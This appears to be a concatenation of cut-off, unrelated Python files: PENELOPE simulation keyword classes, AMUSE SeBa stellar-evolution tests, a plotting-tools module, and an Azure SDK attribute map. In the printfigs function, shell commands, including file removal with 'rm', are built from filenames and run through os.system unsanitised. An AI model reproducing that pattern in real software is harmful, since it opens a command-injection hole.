return super().add(kb, eabs1, eabs2, eabs3)
class InteractionForcings(KeywordSequence):
"""Forcing of interactions.
FORCER is the forcing factor, which must
be larger than unity. WLOW and WHIG are the lower and upper
limits of the pweight window where interaction forcing is
applied. When several interaction mechanisms are forced in
the same body, the effective weight window is set equal to
the intersection of the windows for these mechanisms.
If the mean free path for real interactions of type ICOL is
MFP, the program will simulate interactions of this type
(real or forced) with an effective mean free path equal to
MFP/FORCER.
.. hint::
A negative input value of FORCER, -FN, is assumed to mean that a particle
with energy E=EPMAX should interact, on average, +FN times in the course
of its slowing down to rest, for electrons and positrons, or along a mean
free path, for photons. This is very useful, e.g., to generate x-ray
spectra from bulk samples.
"""
def __init__(self, maxlength=120000):
keyword = TypeKeyword(
"IFORCE",
(int, KPAR, ICOL, float, float, float),
comment="KB,KPAR,ICOL,FORCER,WLOW,WHIG",
)
super().__init__(keyword, maxlength)
def add(self, kb, kpar, icol, forcer, wlow, whig):
"""
Adds forcing for an interaction.
Args:
kb (int): Index of body.
kparp (:class:`KPAR`): Type of primary particles
"""
return super().add(kb, kpar, icol, forcer, wlow, whig)
class IBRSPL(KeywordSequence):
"""Bremsstrahlung splitting for electrons and positrons.
.. note::
Note that bremsstrahlung splitting is applied in combination
with interaction forcing and, consequently, it is activated
only in those bodies where interaction forcing is active.
"""
def __init__(self, maxlength=5000):
keyword = TypeKeyword("IBRSPL", (int, float), comment="KB,splitting factor")
super().__init__(keyword, maxlength)
def add(self, kb, ibrspl):
"""
Add Bremsstrahlung splitting.
Args:
kb (int): Index of body.
ibrspl (int): Splitting factor.
"""
return super().add(kb, ibrspl)
class IXRSPL(KeywordSequence):
"""Splitting of characteristic x rays emitted.
Each unsplit x ray with ILB(2)=2 (i.e., of the second generation) when
extracted from the secondary stack is split into IXRSPL quanta.
The new, lighter, quanta are assigned random directions distributed
isotropically.
"""
def __init__(self, maxlength=5000):
keyword = TypeKeyword("IXRSPL", (int, float), comment="KB,splitting factor")
super().__init__(keyword, maxlength)
def add(self, kb, ixrspl):
"""
Add characteristic x rays splitting.
Args:
kb (int): Index of body.
ixrspl (int): Splitting factor.
"""
return super().add(kb, ixrspl)
class NBE(TypeKeyword):
"""Definition of energy distributions of emerging particles."""
def __init__(self):
super().__init__(
"NBE", (float, float, int), comment="Energy window and no. of bins"
)
def set(self, el, eu, nbe):
"""
Sets energy distributions.
Args:
el (float): Lower limit in eV.
eu (float): Upper limit in eV.
nbe (int): Number of bins in the output energy distribution.
Should be less than 1000.
If NBE is positive, energy bins have uniform width,
DE=(EU-EL)/NBE.
When NBE is negative, the bin width increases geometrically
with the energy, i.e., the energy bins have uniform width on a
logarithmic scale.
"""
super().set(el, eu, nbe)
class NBANGL(TypeKeyword):
"""Definition of angular distributions of emerging particles.
.. note::
In the output files, the terms 'upbound' and 'downbound' are used to
denote particles that leave the material system moving upwards (W>0) and
downwards (W<0), respectively.
"""
def __init__(self):
super().__init__(
"NBANGL", (int, int), comment="No. of bins for the angles THETA and PHI"
)
def set(self, nbth, nbph):
"""
Sets angular distributions.
Args:
nbth (int): Numbers of bins for the polar angle THETA.
Should be less than 3600.
If NBTH is positive, angular bins have uniform width,
DTH=180./NBTHE.
When NBTH is negative, the bin width increases geometrically
with THETA, i.e., the bins have uniform width on a logarithmic
scale.
nbph (int): Number of bins for the azimuthal angle PHI
Should be less than 180.
"""
super().set(nbth, nbph)
# TODO: Fix ENDETC, EDSPC. It should be a KeywordSequence
class ENDETC(TypeKeyword):
"""Definition of an energy-deposition detector."""
def __init__(self):
super().__init__(
"ENDETC", (float, float, int), comment="Energy window and no. of bins"
)
def set(self, el, eu, nbe):
"""
Sets energy limits.
Args:
el (float): Lower limit in eV.
eu (float): Upper limit in eV.
nbe (int): Number of bins in the output energy distribution.
Should be less than 1000.
If NBE is positive, energy bins have uniform width,
DE=(EU-EL)/NBE.
When NBE is negative, the bin width increases geometrically
with the energy, i.e., the energy bins have uniform width on a
logarithmic scale.
"""
super().set(el, eu, nbe)
class EDSPC(TypeKeyword):
"""Name of the output spectrum file."""
def __init__(self):
super().__init__("EDSPC", (str,), comment="Output spectrum file name, 20 chars")
def set(self, filename):
"""
Sets filename.
Args:
filename (str): File name of output spectrum file (up to 20 characters).
"""
super().set(filename)
class GRIDX(TypeKeyword):
"""Definition of x-coordinates of the vertices of the dose box."""
def __init__(self):
super().__init__(
"GRIDX",
(float, float, int),
comment="X coords of the box vertices, no. of bins",
)
def set(self, xl, xu, ndbx):
"""
Sets dimensions.
Args:
xl (float): Lower limit of the dose box along the x-axis in cm.
xu (float): Upper limit of the dose box along the x-axis in cm.
ndbx (int): Number of bins (i.e. voxels) along the x-axis.
"""
super().set(xl, xu, ndbx)
class GRIDY(TypeKeyword):
"""Definition of y-coordinates of the vertices of the dose box."""
def __init__(self):
super().__init__(
"GRIDY",
(float, float, int),
comment="Y coords of the box vertices, no. of bins",
)
def set(self, yl, yu, ndby):
"""
Sets dimensions.
Args:
yl (float): Lower limit of the dose box along the y-axis in cm.
yu (float): Upper limit of the dose box along the y-axis in cm.
ndby (int): Number of bins (i.e. voxels) along the y-axis.
"""
super().set(yl, yu, ndby)
class GRIDZ(TypeKeyword):
"""Definition of z-coordinates of the vertices of the dose box."""
def __init__(self):
super().__init__(
"GRIDZ",
(float, float, int),
comment="Z coords of the box vertices, no. of bins",
)
def set(self, zl, zu, ndbz):
"""
Sets dimensions.
Args:
zl (float): Lower limit of the dose | |
<gh_stars>1-10
import numpy
from amuse.test.amusetest import TestWithMPI
from amuse.community.seba.interface import SeBaInterface, SeBa
from amuse.units import units
from amuse.units import constants
from amuse.datamodel import Particle
from amuse.datamodel import Particles
class TestSeBaInterface(TestWithMPI):
def test1(self):
instance = self.new_instance_of_an_optional_code(SeBaInterface)
endtime, mass, radius, luminosity, temperature, time_step, stellar_type, error = instance.evolve_star(1, 4600, 0.02)
self.assertEquals(error, 0)
self.assertTrue( endtime <= 4600.0)
self.assertAlmostRelativeEqual(endtime, 4600.0, 4)
self.assertAlmostRelativeEqual(mass, 1.0, 6)
self.assertAlmostRelativeEqual(radius, 0.9856, 4)
self.assertAlmostRelativeEqual(luminosity, 0.9585, 4)
self.assertAlmostRelativeEqual(temperature, 5751, 4)
self.assertAlmostRelativeEqual(time_step, 1089.3, 4)
self.assertEqual(stellar_type, 1)
instance.stop()
def test2(self):
instance = SeBaInterface() #self.new_instance_of_an_optional_code(SeBaInterface)
error = instance.initialize_code()
self.assertEquals(error, 0)
index,error = instance.new_particle(1.)
self.assertEquals(error, 0)
self.assertEquals(index, 1)
mass, error = instance.get_mass(index)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(mass, 1.0, 6)
value, error = instance.get_radius(index)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(value, 0.88824945029751212, 6)
stellar_type, error = instance.get_stellar_type(index)
self.assertEquals(error, 0)
self.assertEquals(stellar_type, 1)
instance.stop()
def test3(self):
instance = SeBaInterface() #self.new_instance_of_an_optional_code(SeBaInterface)
error = instance.initialize_code()
self.assertEquals(error, 0)
index,error = instance.new_particle(1.)
self.assertEquals(error, 0)
self.assertEquals(index, 1)
error = instance.evolve_model(4600)
self.assertEquals(error, 0)
mass, error = instance.get_mass(index)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(mass, 1.0, 6)
value, error = instance.get_radius(index)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(value, 0.9856, 4)
value, error = instance.get_temperature(index)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(value, 5751, 4)
value, error = instance.get_time_step(index)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(value, 1089.3, 4)
stellar_type, error = instance.get_stellar_type(index)
self.assertEquals(error, 0)
self.assertEquals(stellar_type, 1)
instance.stop()
def test4(self):
instance = SeBaInterface() #self.new_instance_of_an_optional_code(SeBaInterface)
error = instance.initialize_code()
self.assertEquals(error, 0)
index,error = instance.new_particle(1.)
self.assertEquals(error, 0)
self.assertEquals(index, 1)
for t in range(46):
error = instance.evolve_model((t+1) * 100)
self.assertEquals(error, 0)
mass, error = instance.get_mass(index)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(mass, 1.0, 6)
value, error = instance.get_radius(index)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(value, 0.9856, 4)
value, error = instance.get_temperature(index)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(value, 5751, 4)
value, error = instance.get_time_step(index)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(value, 1089.3, 4)
stellar_type, error = instance.get_stellar_type(index)
self.assertEquals(error, 0)
self.assertEquals(stellar_type, 1)
instance.stop()
def test5(self):
instance = SeBaInterface() #self.new_instance_of_an_optional_code(SeBaInterface)
error = instance.initialize_code()
self.assertEquals(error, 0)
index,error = instance.new_particle([1., 2., 3.])
self.assertEquals(error, 0)
self.assertEquals(index, [1,2,3])
mass, error = instance.get_mass(2)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(mass, 2 , 6)
mass, error = instance.get_mass(3)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(mass, 3, 6)
error = instance.evolve_model(4600)
self.assertEquals(error, 0)
mass, error = instance.get_mass(index)
print mass
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(mass[0], 1.0, 6)
self.assertAlmostRelativeEqual(mass[1], 0.62973, 4)
self.assertAlmostRelativeEqual(mass[2], 0.75012, 4)
instance.stop()
def test6(self):
instance = SeBaInterface() #self.new_instance_of_an_optional_code(SeBaInterface)
error = instance.initialize_code()
self.assertEquals(error, 0)
index,error = instance.new_particle([1., 2., 3.])
self.assertEquals(error, 0)
self.assertEquals(index, [1,2,3])
for t in range(46):
error = instance.evolve_model((t+1) * 100)
self.assertEquals(error, 0)
mass, error = instance.get_mass(index)
print mass
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(mass, [1.0, 0.62973, 0.75072], 4)
instance.stop()
def test7(self):
instance = SeBaInterface() #self.new_instance_of_an_optional_code(SeBaInterface)
error = instance.initialize_code()
self.assertEquals(error, 0)
index,error = instance.new_particle([1., 2., 3.])
self.assertEquals(error, 0)
self.assertEquals(index, [1,2,3])
mass, error = instance.get_mass(2)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(mass, 2 , 6)
mass, error = instance.get_mass(3)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(mass, 3, 6)
mass, error = instance.get_mass(4)
self.assertEquals(error, -1)
error = instance.delete_star(2)
self.assertEquals(error, 0)
mass, error = instance.get_mass(2)
self.assertEquals(error, -1)
mass, error = instance.get_mass(3)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(mass, 3, 6)
index, error = instance.new_particle(4.)
self.assertEquals(error, 0)
self.assertEquals(index, 4)
instance.stop()
def test8(self):
instance = SeBaInterface() #self.new_instance_of_an_optional_code(SeBaInterface)
error = instance.initialize_code()
self.assertEquals(error, 0)
index,error = instance.new_particle([3.0,1.0,2.0])
self.assertEquals(error, 0)
self.assertEquals(index, [1,2,3])
error = instance.delete_star(1)
self.assertEquals(error, 0)
error = instance.evolve_model(4600);
mass, error = instance.get_mass(2)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(mass, 1, 6)
error = instance.delete_star(3)
self.assertEquals(error, 0)
index,error = instance.new_particle([5.0])
self.assertEquals(error, 0)
mass, error = instance.get_mass(index)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(mass, 5.0, 6)
error = instance.evolve_model(5000);
mass, error = instance.get_mass(index)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(mass, 0.99057, 4)
error = instance.delete_star(2)
self.assertEquals(error, 0)
error = instance.delete_star(index)
self.assertEquals(error, 0)
for i in range(4):
mass, error = instance.get_mass(index+1)
self.assertEquals(error, -1)
index,error = instance.new_particle([5.0])
self.assertEquals(error, 0)
error = instance.evolve_model(10000);
mass, error = instance.get_mass(index)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(mass, 0.99057, 4)
instance.stop()
def test9(self):
instance = SeBaInterface() #self.new_instance_of_an_optional_code(SeBaInterface)
error = instance.initialize_code()
self.assertEquals(error, 0)
instance.set_metallicity(0.001)
index,error = instance.new_particle([3.0,0.3])
self.assertEquals(error, 0)
self.assertEquals(index, [1,2])
mu = (3.3 | units.MSun) * constants.G
orbital_period = 200.0 | units.day
semi_major_axis = (((orbital_period / 2.0 * numpy.pi)**2)*mu)**(1.0/3.0)
print semi_major_axis.value_in(units.RSun)
eccentricity = 0.5
index,error = instance.new_binary(
semi_major_axis.value_in(units.RSun),
eccentricity,
index[0],
index[1]
)
self.assertEquals(error, 0)
self.assertEquals(index, 3)
mass, error = instance.get_mass(index)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(mass, 3.3, 4)
mass, error = instance.get_mass(2)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(mass, 0.3, 4)
error = instance.evolve_model(300)
self.assertEquals(error, 0)
mass, error = instance.get_mass(1)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(mass, 2.98777, 4)
mass, error = instance.get_mass(2)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(mass, 0.29999, 4)
error = instance.evolve_model(400)
self.assertEquals(error, 0)
mass, error = instance.get_mass(1)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(mass, 0.86679, 4)
mass, error = instance.get_mass(2)
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(mass, 0.3, 4)
error = instance.delete_binary(index)
self.assertEquals(error, 0)
mass, error = instance.get_mass(index)
self.assertEquals(error, -1)
# check if singles are still in the mode and evolve
value, error = instance.get_age([1,2])
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(value, 400, 4)
error = instance.evolve_model(500)
self.assertEquals(error, 0)
value, error = instance.get_age([1,2])
self.assertEquals(error, 0)
self.assertAlmostRelativeEqual(value, 500, 4)
class TestSeBa(TestWithMPI):
def test1(self):
instance = self.new_instance_of_an_optional_code(SeBa)
endtime, mass, radius, luminosity, temperature, time_step, stellar_type = instance.evolve_star(1 | units.MSun, 4600 | units.Myr, 0.02)
self.assertTrue( endtime <= 4600 | units.Myr)
self.assertAlmostRelativeEqual(mass, 1.0 | units.MSun, 4)
self.assertAlmostRelativeEqual(radius, 0.9856 | units.RSun, 4)
self.assertAlmostRelativeEqual(luminosity, 0.9585 | units.LSun, 4)
self.assertAlmostRelativeEqual(temperature, 5751 | units.K, 4)
self.assertAlmostRelativeEqual(time_step, 1089.3 | units.Myr, 4)
self.assertEqual(stellar_type, 1 | units.stellar_type)
def test2(self):
instance = self.new_instance_of_an_optional_code(SeBa)
p = Particle()
p.mass = 5 | units.MSun
p.metallicity = 0.02
p = instance.particles.add_particle(p)
instance.evolve_model(130 | units.Myr)
print p
self.assertAlmostRelativeEqual(p.mass, 0.9906 | units.MSun, 4)
def test3(self):
print "Testing evolution of a close binary system..."
instance = self.new_instance_of_an_optional_code(SeBa)
instance.commit_parameters()
stars = Particles(2)
stars[0].mass = 3.0 | units.MSun
stars[1].mass = 0.3 | units.MSun
mu = (3.3 | units.MSun) * constants.G
orbital_period = 200.0 | units.day
semi_major_axis = (((orbital_period / (2.0 * numpy.pi))**2)*mu)**(1.0/3.0)
instance.particles.add_particles(stars)
binaries = Particles(1)
binary = binaries[0]
binary.semi_major_axis = semi_major_axis
binary.eccentricity = 0.5
binary.child1 = stars[0]
binary.child2 = stars[1]
instance.binaries.add_particles(binaries)
from_seba_to_model = instance.particles.new_channel_to(stars)
from_seba_to_model.copy()
from_seba_to_model_binaries = instance.binaries.new_channel_to(binaries)
from_seba_to_model_binaries.copy()
previous_type = binary.child1.stellar_type
results = []
current_time = 0 | units.Myr
while current_time < (480 | units.Myr):
instance.update_time_steps()
# The next line appears a bit weird, but saves time for this simple test.
deltat = max(1.0*instance.binaries[0].time_step, 0.1| units.Myr)
current_time = current_time + deltat
instance.evolve_model(current_time)
from_seba_to_model.copy()
from_seba_to_model_binaries.copy()
if not binary.child1.stellar_type == previous_type:
results.append((binary.age, binary.child1.mass, binary.child1.stellar_type))
previous_type = binary.child1.stellar_type
self.assertEqual(len(results), 6)
for x in results:
print x
types = (
"Hertzsprung Gap",
"First Giant Branch",
"Core Helium Burning",
"First Asymptotic Giant Branch",
"Giant Branch Naked Helium star",
"Carbon/Oxygen White Dwarf",
)
for result, expected in zip(results, types):
self.assertEquals(str(result[2]), expected)
times = (
377.6369 | units.Myr,
379.8877 | units.Myr,
382.3112 | units.Myr,
473.4804 | units.Myr,
475.4766 | units.Myr,
476.6182 | units.Myr,
)
for result, expected in zip(results, times):
self.assertAlmostEqual(result[0].value_in(units.Myr), expected.value_in(units.Myr), 0)
masses = (
3.0000 | units.MSun,
3.0000 | units.MSun,
2.9983 | units.MSun,
2.9741 | units.MSun,
0.6710 | units.MSun,
0.6596 | units.MSun,
)
for result, expected in zip(results, masses):
self.assertAlmostEqual(result[1].value_in(units.MSun), expected.value_in(units.MSun), 2)
instance.stop()
def test5(self):
instance = self.new_instance_of_an_optional_code(SeBa)
self.assertAlmostRelativeEquals(instance.parameters.metallicity , 0.02)
instance.parameters.metallicity = 0.04
self.assertAlmostRelativeEquals(instance.parameters.metallicity , 0.04)
def test6(self):
instance = self.new_instance_of_an_optional_code(SeBa)
self.assertFalse(instance.parameters.is_logging_of_evolve_enabled)
instance.parameters.is_logging_of_evolve_enabled = True
self.assertTrue(instance.parameters.is_logging_of_evolve_enabled)
def test7(self):
instance = self.new_instance_of_an_optional_code(SeBa)
instance.commit_parameters()
stars = Particles(2)
stars[0].mass = 3.0 | units.MSun
stars[1].mass = 0.3 | units.MSun
mu = (3.3 | units.MSun) * constants.G
orbital_period = 200.0 | units.day
semi_major_axis = (((orbital_period / (2.0 * numpy.pi))**2)*mu)**(1.0/3.0)
instance.particles.add_particles(stars)
binaries = Particles(1)
binary = binaries[0]
binary.semi_major_axis = semi_major_axis
binary.eccentricity = 0.5
binary.child1 = stars[0]
binary.child2 = stars[1]
instance.binaries.add_particles(binaries)
self.assertAlmostRelativeEquals(instance.binaries[0].child1.mass, 3.0 | units.MSun, 4)
self.assertAlmostRelativeEquals(instance.binaries[0].child2.mass, 0.3 | units.MSun, 4)
def xtest7(self):
instance = self.new_instance_of_an_optional_code(SeBa)
instance.parameters.metallicity = 0.03
p = Particle()
p.mass = 99.1605930967 | units.MSun
p = instance.particles.add_particle(p)
instance.evolve_model(614 | units.Myr)
print p.stellar_type
self.assertEquals(str(p.stellar_type),'Black Hole')
self.assertAlmostRelativeEqual(p.mass, 0.9906 | units.MSun, 4)
def test8(self):
instance = self.new_instance_of_an_optional_code(SeBa)
instance.parameters.supernova_kick_velocity = 0 | units.kms
instance.commit_parameters()
print "v_kick=", instance.parameters.supernova_kick_velocity
stars = Particles(2)
stars[0].mass = 10.0 | units.MSun
stars[1].mass = 9 | units.MSun
semi_major_axis = 10000|units.AU
instance.particles.add_particles(stars)
binaries = Particles(1)
binary = binaries[0]
binary.semi_major_axis = semi_major_axis
binary.eccentricity = 0
binary.child1 = stars[0]
binary.child2 = stars[1]
instance.binaries.add_particles(binaries)
instance.evolve_model(30|units.Myr)
print instance.particles
print instance.binaries
self.assertAlmostRelativeEquals(instance.binaries[0].eccentricity, 0.7872, 4)
def test9(self):
instance = self.new_instance_of_an_optional_code(SeBa)
stars = Particles(2)
stars[0].mass = 10.0 | units.MSun
stars[1].mass = 9 | units.MSun
instance.particles.add_particles(stars)
instance.evolve_model(30|units.Myr)
self.assertAlmostRelativeEquals(instance.particles.age, [30,30] |units.Myr)
self.assertAlmostRelativeEquals(instance.model_time, 30 | units.Myr)
self.assertAlmostRelativeEquals(instance.particles[0].mass, 1.2263 | units.MSun, 4)
self.assertAlmostRelativeEquals(instance.particles[1].mass, 8.8682 | units.MSun, 4)
stars = Particles(2)
stars[0].mass = 10.0 | units.MSun
stars[1].mass = 9 | units.MSun
instance.particles.add_particles(stars)
instance.evolve_model(60|units.Myr)
print instance.particles.age
print instance.particles.mass
self.assertAlmostRelativeEquals(instance.model_time, 60 | units.Myr)
self.assertAlmostRelativeEquals(instance.particles.age, [60,60,30,30] |units.Myr)
self.assertAlmostRelativeEquals(instance.particles[2].mass, 1.2263 | units.MSun, 4)
self.assertAlmostRelativeEquals(instance.particles[3].mass, 8.8682 | units.MSun, 4)
def test10(self):
""" Test supernova | |
"""A collection of tools, tips, and tricks.
2009-07-20 22:36 IJC: Created
2010-10-28 11:53 IJMC: Updated documentation for Sphinx.
2011-06-15 09:34 IJMC: More functions have been added; cleaned documentation.
"""
import pdb
import numpy as np
def getfigs():
"""Return a list of all open matplotlib figures.
No inputs or options."""
from matplotlib._pylab_helpers import Gcf
figs = [manager.canvas.figure for manager in Gcf.get_all_fig_managers()]
figlist = [fig.number for fig in figs]
return figlist
def nextfig():
"""Return one greater than the largest-numbered figure currently
open. If no figures are open, return unity.
No inputs or options."""
# 2010-03-01 14:28 IJC: Created
figlist = getfigs()
if len(figlist)==0:
return 1
else:
return max(figlist)+1
return figlist
def printfigs(filename, figs=None, format=None, pdfmode='texexec', verbose=False, closefigs=False):
"""Print desired figures using designated 'format'. Concatenate PDFs.
:Inputs:
filename -- string. prepended to all open figures
figs -- int or list.
figures to access, then apply savefig to. If None, print
all open figures; if -1, print current figure.
format -- string or list of strings.
if 'pdf', all images are concatenated into one file (use
"pdfs" for individual pdf figure files)
pdfmode -- string;
method of concatenating PDFs. Either 'texexec' or 'gs'
(for GhostScript) or 'tar' to wrap individual
figures in a Tarball.
closefigs -- bool
If True, close each figure after printing it to disk.
:NOTES:
If no explicit path is passed and a subdirectory 'figures'
exists in the current directory, the figures will be printed in
'figures' instead.
:EXAMPLE:
::
from pylab import *
figure(1); plot(arange(10), randn(10), 'ob')
figure(2); plot(arange(15), randn(15), '-xr')
printfigs('testing')
!open testing.pdf
"""
# 2009-07-20 23:10 IJC: Created; inspired by FGD.
# 2009-09-08 13:54 IJC: Made it work with single-figure, non-list input.
# 2010-02-02 11:50 IJC: Now it kills the 'logfile' detritus.
# 2010-10-27 17:05 IJC: New texexec syntax is "result=...", not "result ..."
# 2011-03-01 18:14 IJC: Added capability for multiple formats (in
# a list). Also, figure numbers are not
# catted to the filename when saving a
# single figure.
# 2011-08-29 10:23 IJMC: Now don't try to concatenate single PDF figures.
# 2012-11-01 11:41 IJMC: Slightly changed if-block for 'figs'.
# 2014-05-03 15:04 IJMC: Added 'closefigs' flag.
# 2014-09-02 08:50 IJMC: Added 'tar' PDFMODE
# 2015-12-08 09:03 IJMC: Now 'None' is also valid PDF mode
from pylab import savefig, figure, gcf, close
from matplotlib._pylab_helpers import Gcf
import os
import pdb
figlist = getfigs()
if verbose: print "Available figure numbers>>" ,figlist
if figs is None:
figs = figlist
elif figs is -1:
figs = [gcf().number]
else:
if hasattr(figs, '__iter__'):
figs = list(figs)
else:
figs = [figs]
figlist = [val for val in figs if val in figlist]
nfig = len(figlist)
print "Figures to print>>",figlist
if format==None:
format = filename[-3::]
filename = filename[0:len(filename)-4]
if hasattr(format, 'capitalize'):
format = [format]
nformat = 1
elif hasattr(format, '__iter__'):
nformat = len(format)
else:
format = [str(format)]
nformat = 1
if len(figlist)==0:
print "No open figures found; exiting."
return
for thisformat in format:
fnamelist = []
for ii in range(nfig):
if nfig>1:
fname = filename + str(figlist[ii])
else:
fname = filename
if thisformat=='pdf' and nfig>1:
fname = fname + '_temp'
if thisformat=='pdfs':
fname = fname + '.pdf'
else:
fname = fname + '.' + thisformat
figure(figlist[ii])
savefig(fname )
fnamelist.append(fname)
if closefigs and thisformat==format[-1]: # last time at this figure
close(figlist[ii])
if thisformat=='pdf':
if nfig==1:
savefig(fnamelist[0])
else: # we have to concatenate multiple PDF figures:
bigfilename = filename + '.' + thisformat
if os.path.isfile(bigfilename):
os.remove(bigfilename)
if pdfmode is None:
execstr, rmstr = '', ''
elif pdfmode=='gs':
execstr = 'gs -q -sPAPERSIZE=letter -dNOPAUSE -dBATCH -sDEVICE=pdfwrite -sOutputFile=' + bigfilename
rmstr = ''
elif pdfmode=='texexec':
execstr = 'texexec --pdfcopy --result=' + bigfilename
rmstr = 'rm %s' % bigfilename.replace('pdf','log')
elif pdfmode[0:3]=='tar':
execstr = 'tar -cvf %s ' % bigfilename.replace('pdf','tar')
fnamelist_local = [os.path.split(fn)[1] for fn in fnamelist]
[os.rename(fn, fn2) for fn,fn2 in zip(fnamelist, fnamelist_local)]
rmstr = 'rm ' + ' '.join(fnamelist_local)
fnamelist = fnamelist_local
else:
execstr = ''
rmstr = ''
for fn in fnamelist:
execstr += ' ' + fn
#pdb.set_trace()
if verbose: print "PDFMODE exec call>>", execstr
os.system(execstr)
#subprocess.call(execstr)
#pdb.set_trace()
if len(rmstr)>0:
os.system(rmstr)
if pdfmode is not None:
for fn in fnamelist:
try:
os.remove(fn)
except:
pass
return
def plotstyle(i, c=['b', 'g', 'r', 'c', 'm', 'y', 'k'], \
s=['.', 'x', 's', '^', '*', 'o', '+', 'v', 'p', 'D'], \
l=['-', '--', '-.', ':']):
"""Return plot properties to help distinguish many types of plot symbols.
:INPUT:
i -- int.
:OPTIONAL INPUT:
c -- color, or list of colors accepted by pylab.plot
s -- symbol, or list of symbols accepted by pylab.plot
l -- linestyle, or list of linestyles accepted by pylab.plot
:OUTPUT:
tuple of (color, symbol, linestyle)
:REQUIREMENTS: :doc:`numpy`
"""
# 2009-09-10 16:42 IJC: Created
from numpy import tile, array
if not c.__class__==list:
c = list(c)
if not s.__class__==list:
s = list(s)
if not l.__class__==list:
l = list(l)
nc = len(c)
ns = len(s)
nl = len(l)
if not hasattr(i,'__iter__'):
i = array([i])
i = abs(array(i))
nrepc = (max(i)/nc+1.).astype(int)
nreps = (max(i)/ns+1.).astype(int)
nrepl = (max(i)/nl+1.).astype(int)
c = tile(c, nrepc)
s = tile(s, nreps)
l = tile(l, nrepl)
if len(i)==1:
ret = c[i][0], s[i][0], l[i][0]
else:
ret = list(c[i]),list(s[i]),list(l[i])
return ret
def flatten(L, maxdepth=100):
"""Flatten a list.
Stolen from http://mail.python.org/pipermail/tutor/2001-January/002914.html"""
# 2009-09-10 16:54 IJC: Input.
if type(L) != type([]): return [L]
if L == []:
return L
else:
maxdepth -= 1
return flatten(L[0]) + flatten(L[1:], maxdepth=maxdepth)
def replaceall(seq, obj, rep):
"""Replace all instances of 'obj' with 'rep' in list 'seq'
:INPUT:
seq -- (list) list within which to find-and-replace elements
obj -- target object to replace
rep -- replacement object
:EXAMPLE:
::
import tools
b = [2, ['spam', ['eggs', 5, dict(spam=3)]]]
tools.replaceall(b, 'spam', 'bacon')
print b
:NOTES:
-- Will fail if 'obj' is itself a list.
-- Edits list in-place, so make a copy first if you want to
retain the old version of your list.
-- Has not been tested for extremely deep lists
:SEE ALSO:
:func:`popall`
"""
#2009-09-11 10:22 IJC: Created
n = len(seq)
for ii in range(n):
if seq[ii].__class__==list:
replaceall(seq[ii], obj, rep)
else:
if seq[ii]==obj:
seq[ii]=rep
return
def popall(seq, obj):
"""Remove all instances of 'obj' from list 'seq'
:INPUT:
seq -- (list) list from which to pop elements
obj -- target object to remove
:EXAMPLE:
::
import tools
b = [3, 'spam', range(5)]
tools.popall(b, 4)
print b
:NOTES:
-- Will fail if 'obj' is itself a list.
-- Edits list in-place, so make a copy first if you want to
retain the old version of your list.
-- Has not been tested for extremely deep lists
:SEE ALSO:
:func:`replaceall`
"""
#2009-09-11 10:22 IJC: Created
n = len(seq)
for ii in range(n):
print ii,seq[ii]
if seq[ii].__class__==list:
popall(seq[ii], obj)
doneYet = False
while not doneYet:
try:
seq.remove(obj)
except:
doneYet = True
return
def drawRectangle(x,y,width,height,**kw):
"""Draw a rectangle patch on the current, or specified, axes.
:INPUT:
x, y -- lower-left corner of rectangle
width, height -- dimensions of rectangle
:OPTIONAL INPUT:
ax -- Axis to draw upon. if None, defaults to current axes.
dodraw -- if True, call 'draw()' function to immediately re-draw axes.
**kw -- options passable to :func:`matplotlib.patches.Rectangle`
:NOTE: Axes will NOT auto-rescale after this is called.
"""
# 2009-09-17 01:33 IJC: Created
# 2014-03-01 13:51 IJMC: Added 'dodraw' option.
import matplotlib.pyplot as plt
import matplotlib.patches as mpatches
if kw.has_key('ax'):
ax = kw.pop('ax')
else:
ax = plt.gca()
p = mpatches.Rectangle((x,y), width, height, **kw)
ax.add_patch(p)
if kw.has_key('dodraw') and kw['dodraw']: plt.draw()
return ax, p
def drawPolygon(xy,**kw):
"""Draw a rectangle patch on the current, or specified, axes.
:INPUT:
xy -- numpy array of coordinates, with shape Nx2.
:OPTIONAL INPUT:
ax -- Axis to draw upon. if None, defaults to current axes.
dodraw -- if True, call 'draw()' function to immediately re-draw axes.
**kw -- options passable to :func:`matplotlib.patches.Polygon`
:SEE ALSO:
:func:`drawRectangle`
:NOTE: | |
'last_modified_time_utc': {'readonly': True},
'traffic_manager_host_names': {'readonly': True},
'target_swap_slot': {'readonly': True},
'outbound_ip_addresses': {'readonly': True},
'possible_outbound_ip_addresses': {'readonly': True},
'suspended_till': {'readonly': True},
'max_number_of_workers': {'readonly': True},
'resource_group': {'readonly': True},
'is_default_container': {'readonly': True},
'default_host_name': {'readonly': True},
'slot_swap_status': {'readonly': True},
}
_attribute_map = {
'id': {'key': 'id', 'type': 'str'},
'name': {'key': 'name', 'type': 'str'},
'kind': {'key': 'kind', 'type': 'str'},
'location': {'key': 'location', 'type': 'str'},
'type': {'key': 'type', 'type': 'str'},
'tags': {'key': 'tags', 'type': '{str}'},
'identity': {'key': 'identity', 'type': 'ManagedServiceIdentity'},
'state': {'key': 'properties.state', 'type': 'str'},
'host_names': {'key': 'properties.hostNames', 'type': '[str]'},
